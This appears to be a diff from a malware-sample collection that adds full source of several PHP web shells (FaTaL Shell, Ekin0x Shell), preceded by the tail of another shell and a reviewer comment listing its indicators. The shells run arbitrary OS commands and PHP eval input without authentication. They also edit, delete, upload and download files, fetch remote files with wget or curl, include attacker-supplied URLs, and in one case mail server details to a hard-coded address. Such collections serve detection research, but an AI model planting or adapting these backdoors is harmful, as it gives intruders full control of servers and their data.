for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td align=\"center\" $color> $perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td $color> <b><a href=\"{$fstring}&amp;chdir=$chdirpox\"><font
color=\"#008000\">$file</font></a></b> </td>";
} else {
echo "<td $color> <b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\"><font
color=\"#008000\">$file</font></a> </b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td $color> <a
href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
} else {
echo "<td $color> $file </td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td $color> <a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a>
</td>";
} else {
echo "<td $color> <a
href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td $color> <a
href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
} else {
echo "<td $color> $file</td>";
}
}
}
echo "<td align=\"right\" $color> $size KB</td>";
if ($mode == 'edit') {
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">Del</a>
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | <a href=\"#{$file}\"
onclick=\"Copy('{$chdir}', '{$file}')\">Copy</a> </td>";
} else {
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">Del</a>
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | Copy </td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
$OS = @PHP_OS;
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
else { $SafeMode = "<i>$SafeMode</i><BR>"; }
$injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe
Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan
Guna Target Ini.<BR>By: MSN PEBA");
$header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment;
filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
$to = ("arms27@fdfrr.com");
$subject = ("Hajar bos");
mail($to,$subject,$psn,$header);
@include "$bn";
?>
</table>
</fieldset></form>
</div>
</body>
</html>
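Review bot: The hard-coded network indicators in this file are not recorded anywhere in the commit: the tail of the script unconditionally calls `mail()` to `arms27@fdfrr.com` with subject `Hajar bos` and a body holding OS, uname, PHP version, safe-mode state and `http://` + `HTTP_HOST` + `REQUEST_URI`, so the shell reports its own URL, and `$mhost` is set to `http://nodan.110mb.com/cmds.txt?`. Those values, plus the page title `***BY PETERSON THE GREATEST CMD***`, belong in an index entry for mail-log, proxy-log and content matching. The `$newuser` string (`net user Admin /add …`) is only linked as "Remote Access" when `PHP_OS` begins with `WIN`, so on Windows hosts a new local `Admin` account is the host-side artefact to check for. Requests are dispatched on the `action` GET parameter (`upload`, `cmd`, `edit`, `save`, `chmod`, and others) with no authentication visible in this section.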

283
PHP/Backdoor.PHP.Agent.bn Normal file

@ -0,0 +1,283 @@
<?php
session_start();
error_reporting(E_ALL ^ E_NOTICE);
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
@ini_set('max_execution_time',0);
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
$version='version 1.0 by FaTaLErrOr';
$action=$_POST['action'];
$file=$_POST['file'];
$dir=$_POST['dir'];
$content='';
$stdata='';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$lang=array(
'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
'uploadok'=>'Baþarýyla Yüklendi.',
'dircrt'=>'Klasör Oluþturuldu.',
'dontlist'=>'Listelenemiyor Ýzin Yok.',
'dircrterr'=>'Oluþturulamýyor Ýzin Yok.',
'dirnf'=>'Dizin Bulunamadi.',
'filenf'=>'.',
'dontwrdir'=>'Sadece Okunabilir.',
'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.',
'deletefileok'=>'Dosya Silindi.',
'deletedirok'=>'Klasör Silindi.',
'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi',
'cantrfile'=>'Dosya Açýlamýyor izin Yok.',
'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..',
'workdir'=>'Çalýþma Dizini: ',
'fullacc'=>'Full Yetki.',
'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
'thisnodir'=>'Klasör Seçin.',
'allfuncsh'=>'Fonksiyoýnlar Kapalý.'
);
$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
function test_file($file){
if(!file_exists($file))$err="1";
elseif(!is_file($file)) $err="2";
elseif(!is_readable($file))$err="3";
elseif(!is_writable($file))$err="4"; else $err="5";
return $err;}
function test_dir($dir){
if(!file_exists($dir))$err="1";
elseif(!is_dir($dir)) $err="2";
elseif(!is_readable($dir))$err="3";
elseif(!is_writable($dir))$err="4"; else $err="5";
return $err;}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;}
function view_size($size){
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;}
if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
if(isset($dir)){
$ts['test']=test_dir($dir);
switch($ts['test']){
case 1:$stdata.=$lang['dirnf'];break;
case 2:$stdata.=$lang['thisnodir'];break;
case 3:$stdata.=$lang['dontlist'];break;
case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
}else $dir=@chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if(isset($file)){
$ts['test1']=test_file($file);
switch ($ts['test1']){
case 1:$stdata.=$lang['filenf'];break;
case 2:$stdata.=$lang['isdontfile'];break;
case 3:$stdata.=$lang['cantrfile'];break;
case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
}
function shell($cmd)
{
global $lang;
$ret = '';
if (!empty($cmd))
{
if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
else $ret=$lang['allfuncsh'];
}
return $ret;
}
function createdir($dir){mkdir($dir);}
//delete file
if($action=="delete"){
if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//delete dir
if($action=="deletedir"){
if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//shell
if($action=="shell"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
<input type=\"submit\" value=\"Uygula\"></form>";}
//editor
if($action=="editor"){
$stdata.="<form method=POST>
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
Dosyanýn Adý (Full Url Yazýn)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
clearstatcache();
$f=fopen($file, "r");
$contents = fread($f,filesize($file));
fclose($f);
return htmlspecialchars($contents);
}
if(@$_POST['save'])writef($file,$_POST['data']);
if(@$_POST['create'])writef($file,"");
$test=test_file($file);
if($test==1){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
<input type=\"reset\" value=\"No\"></form>";
}
if($test>2){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
}}
//viewer
if($action=="viewer"){
$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
if ($GLOBALS['os']==1) {
$content.="<tr><td>HDD Secin:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
$content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
$content.="</td></tr>";
}
$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>';
}
$content.="</table>";
}}}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);}
//phpeval
if($action=="phpeval"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"phpeval\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
&lt;?php<br>
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
?><br>
<input type=\"submit\" value=\"Uygula\"></form>";
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
//upload
if($action=="upload"){
if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
$form_win="<tr><td><form method=POST enctype=multipart/form-data>
<input type=\"hidden\" name=\"action\" value=\"upload\">
Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayý Adlandýr (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
if($os==1)$content.=$form_win;
if($os==0){
$content.=$form_win;
$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
<input type=submit name=upload value=Upload></form></td></tr>';
}
if(isset($_POST['uploadloc'])){
if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else
$uploadfile = $dirupload."/".$_POST['filename'];
if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
if(file_exists($uploadfile))$content.=$lang['filext'];
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
$content.=$lang['uploadok'];
}
if(isset($_POST['upload'])){
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
switch($_POST['with'])
{
case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
}}}
//end function
?><?=$header;?>
<style type="text/css">
<!--
.style4 {
font-size: x-large;
font-weight: bold;
}
.style5 {color: #FF0000}
.style8 {color: #CCFF00}
-->
</style>
<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> Ýleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
<p>&nbsp;</p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php echo $safe_mode;?><br>
<span class="style8">Fonksiyon Kýsýtlamasý:</span> <?php echo $disfunc;?><br>
<span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
<span class="style8">Durum:</span> <?php echo @$stdata;?></td>
</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>

613
PHP/Backdoor.PHP.Agent.bo Normal file

@ -0,0 +1,613 @@
<?
/*###########################################
Ekin0x Shell volume 2.1
Don't make any changes in c0de except if you dont know php programming
Thanx : VoLqaN | Entrika | Deep Emperor | H-B-V | xoron | AuGuSt27 and all Cyber-warrior.org Memberz
###########################################*/
$a = "http://";
$b = "php-shell.org";
$c = "/x.html";
error_reporting(0);
set_magic_quotes_runtime(0);
if(version_compare(phpversion(), '4.1.0') == -1)
{$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
else{return $requ."?".$link."=".$val;}}
function delm($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
$nscmd=htmlspecialchars($scmd);print $nscmd;}
elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
print htmlspecialchars($pret);}}
function input($type,$name,$value,$size)
{if (empty($value)){print "<input type=$type name=$name size=$size>";}
elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
else {print "<input type=$type name=$name value=$value size=$size >";}}
function permcol($path){if (is_writable($path)){print "<font color=red>";
callperms($path); print "</font>";}
elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue >";
callperms($path); print "</font>";}
else {print "<font color=DeepSkyBlue >";callperms($path);}}
if ($dlink=="dwld"){download($_REQUEST['dwld']);}
function download($dwfile) {$size = filesize($dwfile);
@header("Content-Type: application/force-download;name=$dwfile");
@header("Content-Transfer-Encoding: binary");
@header("Content-Length: $size");
@header("Content-Disposition: attachment; filename=$dwfile");
@header("Expires: 0");
@header("Cache-Control: no-cache, must-revalidate");
@header("Pragma: no-cache");
@readfile($dwfile); exit;}
?>
<? include $_GET['baba']; ?>
<html>
<head><title>Ekin0x Shell</title></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
</body>
</html>
<?
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
$sf="<form method=post>";$ef="</form>";
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
$sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
################# Ending of common variables ########################
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## Ekin0x Shell ##
</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
print " - <a href='javascript:history.back()'>Geri</a>";
print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
if ($dlink=='phpinfo'){print phpinfo();die();}
print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Izinleri Kontrol Et</a>";
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
print $sf;input ("text","ncbase",$ncbase,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){
print "<p><b>[ Url - Decoder ]</b>"; print $sf;
input ("text","nurld",$nurld,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "<p>Result is : $sfnt".$urlenc."$efnt"; die();}
if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){
print "<p><b>[ MD5 - Encoder ]</b>";
print $sf;input ("text","nmdf",$nmdf,35);print " ";
input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
print "<pre>";print "<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
}print "</textarea>";print "</pre>";die();}
function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
elseif(isset($showsc)&&filesize($showsc) !=="0") {
print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
input ("text","showsc","",35);print " ";
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
if ($dlink=='cmdhlp'){
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
input ("text","hlp","",35);print " ";
input ("submit","","Help","");print $ef; die();}
